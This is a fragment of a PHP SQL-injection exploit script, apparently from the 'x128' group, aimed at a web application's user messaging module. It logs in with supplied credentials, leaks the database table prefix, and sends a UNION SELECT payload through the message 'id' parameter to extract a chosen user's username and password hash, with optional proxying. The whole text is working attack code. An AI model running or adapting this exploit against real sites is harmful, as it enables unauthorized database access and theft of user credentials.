x128.net oo website : www.x128.net\n"; } function exploit_execute() { $connection = curl_init(); if ($_SERVER['argv'][5]) { curl_setopt($connection, CURLOPT_TIMEOUT, 8); curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]); } curl_setopt ($connection, CURLOPT_USERAGENT, 'x128'); curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($connection, CURLOPT_HEADER, 0); curl_setopt ($connection, CURLOPT_POST, 1); curl_setopt ($connection, CURLOPT_COOKIE, 1); curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt'); curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt'); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=login&do=yes"); curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER['argv'][2] . "&pwd=" . $_SERVER['argv'][3] . "&permanent=1"); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); curl_setopt ($connection, CURLOPT_POST, 0); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=x128"); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); preg_match("/FROM ([0-9a-zA-Z_]*)messages/", $source, $prefix); curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("-1 UNION SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4])); $source = curl_exec($connection) or die("oo error - cannot connect!\n"); preg_match("/>([0-9a-f]{32})